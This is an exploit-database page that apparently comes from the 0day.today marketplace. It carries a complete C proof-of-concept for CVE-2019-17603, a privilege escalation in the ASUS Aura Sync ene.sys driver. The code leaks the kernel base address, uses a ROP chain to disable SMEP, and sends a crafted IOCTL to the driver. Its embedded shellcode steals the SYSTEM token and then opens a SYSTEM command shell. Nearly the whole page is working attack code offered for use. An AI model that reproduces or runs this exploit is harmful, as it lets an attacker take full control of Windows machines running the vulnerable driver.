0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ASUS Aura Sync 1.07.71 Privilege Escalation Exploit
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
// CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit // Discovered by @dhn_ // Author of PoC: Connor McGarr (@33y0re - https://connormcgarr.github.io) // Windows 10 RS1 Version 10.0.14393 Build 14393 // Tested with VBS, HyperGuard, and PatchGuard disabled #include <stdio.h> #include <Windows.h> #include <Psapi.h> // Vulnerable IOCTL in ene.sys #define IOCTL_CODE 0x80102040 unsigned long long kernelBase() { // Defining EnumDeviceDrivers() parameters LPVOID lpImageBase[1024]; DWORD lpcbNeeded; // Calling EnumDeviceDrivers() printf("[+] Calling EnumDeviceDrivers()...\n"); BOOL baseofDrivers = EnumDeviceDrivers( lpImageBase, sizeof(lpImageBase), &lpcbNeeded ); // Error handling if (!baseofDrivers) { printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError()); exit(1); } // ntoskrnl.exe is the first module dumped in the array // Typcasting LPVOID to unsigned long long unsigned long long krnlBase = (unsigned long long)lpImageBase[0]; // Print update for kernel base printf("[+] Found kernel leak!\n"); printf("[+] ntoskrnl.exe is located at: 0x%llx\n", krnlBase); return krnlBase; } void exploitWork(void) { /* [BITS 64] _start: mov rax, [gs:0x188] ; Current thread (_KTHREAD) mov rax, [rax + 0xb8] ; Current process (_EPROCESS) mov rbx, rax ; Copy current process (_EPROCESS) to rbx __loop: mov rbx, [rbx + 0x2e8] ; ActiveProcessLinks sub rbx, 0x2e8 ; Go back to current process (_EPROCESS) mov rcx, [rbx + 0x2e0] ; UniqueProcessId (PID) cmp rcx, 4 ; Compare PID to SYSTEM PID jnz __loop ; Loop until SYSTEM PID is found mov rcx, [rbx + 0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358 and cl, 0xf0 ; Clear out _EX_FAST_REF RefCnt mov [rax + 0x358], rcx ; Copy SYSTEM token to current process xor rax, rax ; STATUS_SUCCESS add rsp, 0xa0 ; Restore execution ret ; Done! */ char payload[] = "\x65\x48\x8B\x04\x25\x88\x01\x00\x00\x48\x8B\x80" "\xB8\x00\x00\x00\x48\x89\xC3\x48\x8B\x9B\xF0" "\x02\x00\x00\x48\x81\xEB\xF0\x02\x00\x00\x48" "\x8B\x8B\xE8\x02\x00\x00\x48\x83\xF9\x04" "\x75\xE5\x48\x8B\x8B\x58\x03\x00\x00\x80" "\xE1\xF0\x48\x89\x88\x58\x03\x00\x00\x48\x31\xC0" "\x48\x81\xC4\xA0\x00\x00\x00\xC3"; // Allocating shellcode in user mode LPVOID shellcode = VirtualAlloc( NULL, sizeof(payload), 0x3000, 0x40 ); // Error handling if (!shellcode) { printf("[-] Error! Unable to allocate shellcode in user mode. Error: %d\n", GetLastError()); exit(1); } // Print statement for exploit printf("[+] CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploit\n"); // Print update for shellcode location printf("[+] Shellcode allocated at: 0x%llx\n", shellcode); // Moving memory into allocated space in user mode RtlMoveMemory( shellcode, payload, sizeof(payload) ); // Running kernelBase() here to get base of kernel for ROP gadgets unsigned long long baseAddress = kernelBase(); // Defining buffer and buffer size to send to the driver char buf [88]; size_t gadgetSize = 0x8; // ROP gadgets are for Windows 10 RS1 Version 10.0.14393 Build 14393 // Run rp++ on the target before execution to adjust offsets accordingnly // rp++.exe -f C:\Windows\system32\ntoskrnl.exe -r 5 >> NTOSKRNL_GADGETS.exe // Defining ROP gadgets unsigned long long ROP1 = baseAddress + 0x4666b; // pop rcx ; ret: ntoskrnl.exe unsigned long long ROP2 = 0x70678; // Intended CR4 value (0x70678) Windows 10 RS1 Version 10.0.14393 Build 14393 unsigned long long ROP3 = baseAddress + 0x1d87d7; // mov cr4, rcx ; ret: ntoskrnl.exe // Using memset to copy memory into array memset(buf, 0x41, 88); // Print update for ROP chain printf("[+] Exedcuting ROP chain to disable SMEP...\n"); memcpy(&buf[56], &ROP1, gadgetSize); memcpy(&buf[56+8], &ROP2, gadgetSize); memcpy(&buf[56+16], &ROP3, gadgetSize); memcpy(&buf[56+24], &shellcode, 0x8); // Obtaining handle to the driver printf("[+] Obtaining handle to the driver via CreateFileA()...\n"); HANDLE drvHandle = CreateFileA( "\\\\.\\EneIo", 0xC0000000, 0x0, NULL, 0x3, 0x0, NULL ); // Error handling if (!drvHandle) { printf("[-] Error! Unable to obtain a handle to the driver. Error: %d\n", GetLastError()); exit(1); } // Print update for HANDLE printf("[+] Handle to the driver: %d\n", drvHandle); // Sending buffer to the driver // Defining lpBytesReturned parameter DWORD lpBytesReturned; // Invoking IOCTL routine BOOL sendIoctl = DeviceIoControl( drvHandle, IOCTL_CODE, buf, sizeof(buf), NULL, 0, &lpBytesReturned, NULL ); // Error handling if (!sendIoctl) { printf("[-] Error! Unable to interact with the driver. Error: %d\n", GetLastError()); exit(1); } printf("[+] Interacting with the driver...\n"); } int main(int argc, char *argv[]) { exploitWork(); // Print update for NT AUTHORITY\SYSTEM shell printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n"); // Spawning an NT AUTHORITY\SYSTEM shell system("cmd.exe /c cmd.exe /K cd C:\\"); return 0; } # 0day.today [2024-07-02] #